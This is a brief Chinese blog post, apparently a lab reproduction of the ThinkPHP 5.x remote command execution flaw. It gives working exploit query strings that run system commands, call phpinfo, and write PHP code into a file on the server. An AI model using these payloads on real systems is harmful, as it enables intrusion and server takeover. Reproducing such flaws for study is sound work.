当前位置: 首页 > news >正文

thinkphp漏洞再现

news 2025/8/26 15:09:53

Thinkphp5x远程命令执行及getshell

1、开环境

2、使用工具攻击

开启工具

输入地址,点击漏洞检测

存在漏洞之后,选择漏洞,执行命令

3、也可以执行远程命令

执行命令

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

http://www.dtcms.com/a/88712.html

相关文章:

  • Anaconda 安装NCL (Linux系统)
  • GithubPages+自定义域名+Cloudfare加速+浏览器收录(2025最新排坑)
  • [免费]SpringBoot+Vue扶贫管理系统【论文+源码+SQL脚本】
  • Unity3D 动态遮挡剔除(Occlusion Culling)
  • 基于Spring Boot的智能停车计费系统的设计与实现(LW+源码+讲解)
  • 针对 WebView 强制使用本地字体的完整解决方案
  • windows docker如何修改 默认的Container memory usage
  • 2025-如何创建自己的电商网站
  • cfca 申请国密证书流程
  • Aider的Repo Map功能
  • 跨域问题的解决方案
  • 基于MATLAB的涡旋光和高斯光叠加产生平顶光
  • 深入解析 TCP:可靠传输的基石
  • YAML是什么?
  • 借助Trae从零开始完成贪吃蛇的项目
  • 解决 Element UI 嵌套弹窗显示灰色的问题!!!
  • LeetCode 解题思路 24(Hot 100)
  • 清华大学第12弹:《DeepSeek政务应用场景与解决方案》.pdf(文末附免费下载地址)
  • git_version_control_proper_practice
  • 【QT】Qlcdnumber的使用
  • C++11QT复习(二)
  • arm之s3c2440的I2C的用法
  • Pycharm社区版创建Flask项目详解
  • ArcGIS Pro属性表添加字段是灰色的,点不了?+属性表导出为excel表格
  • 2025年使用Scrapy和Playwright解决网页抓取挑战的方案
  • 天津大学第二讲:《深度解读DeepSeek:部署、使用、安全》|附PPT下载方法
  • 1、pytest基本用法
  • 【多学科稳定EI会议大合集】计算机应用、通信信号、电气能源工程、社科经管教育、光学光电、遥感测绘、生物医学等多学科征稿!
  • 文档处理控件Aspose.Words 教程:.NET版中增强的 AI 文档摘要功能
  • C#中 String类API(函数)